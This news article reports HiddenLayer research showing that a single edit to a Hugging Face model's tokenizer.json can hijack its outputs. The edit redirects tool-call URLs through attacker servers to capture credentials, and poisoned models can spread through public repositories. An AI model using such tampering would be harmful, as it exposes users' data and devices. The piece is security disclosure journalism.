Hugging Face Packages Weaponized With a Single File Tweak

Hugging Face, an open source store for AI models and components, is open to an attack via the "tokenizer" layer that AI models use to make their outputs human readable.

A cyberattacker could use the threat vector to implement a man-in-the-middle (MitM) approach where a .json file is used to intercept tool call arguments to redirect URL tokens through attacker infrastructure; this gives the threat actor "visibility into every URL the model accesses, API parameters, and any credentials embedded in those requests," HiddenLayer security researcher Divyanshu Divyanshu explained in a blog post released today.

Hidden Layer tested its attack on Hugging Face models run locally using the SafeTensors, ONNX, and GGUF formats. SafeTensors is a model created by Hugging Face and is considered the de facto model standard for the platform; all three are supported by Hugging Face, and all three are popular for a variety of use cases. That said, this is a problem that could impact any platform used for running open source models like LlamaCPP and Ollama.

Related:Hackers Use AI for Exploit Development, Attack Automation

It also only affects models run locally, as the attack relies on modifying local files. As such, models run through Hugging Face's Inference API, for example, are not impacted.

Hugging Face did not respond to a request for comment.

AI Tokenizer Flaw Lets Attackers Hijack Model Outputs

A tokenizer is a kind of translator between human language and computer language for AI models. A model's output starts as a sequence of integer IDs that is then decoded through the tokenizer before the output reaches the user. Hugging Face specifically uses a tokenizer library file named "tokenizer.json" as the mapping for this decoding process in many of its models. Each entry in this file includes a string paired with an ID that can represent a word, subword fragment, or control token, and these libraries can include tens of thousands of entries. As HiddenLayer discovered, the long and short of it is that if an attacker gets ahold of this "tokenizer.json" file and makes even a single edit, they can use it to take direct control over anything the model outputs and possibly gain a foothold into the user's device.

A primary way an attacker might use this attack in the wild is by taking an open source model, editing the tokenizer file, and then uploading the poisoned model to a public repository, thus distributing it to every downstream user that pulls it. "A tampered tokenizer.json is structurally identical to a legitimate one, so it passes through the normal model distribution pipeline without any special delivery mechanism," Divyanshu wrote.

Related:After Replacing TeamPCP Malware, 'PCPJack' Steals Cloud Secrets

... continue reading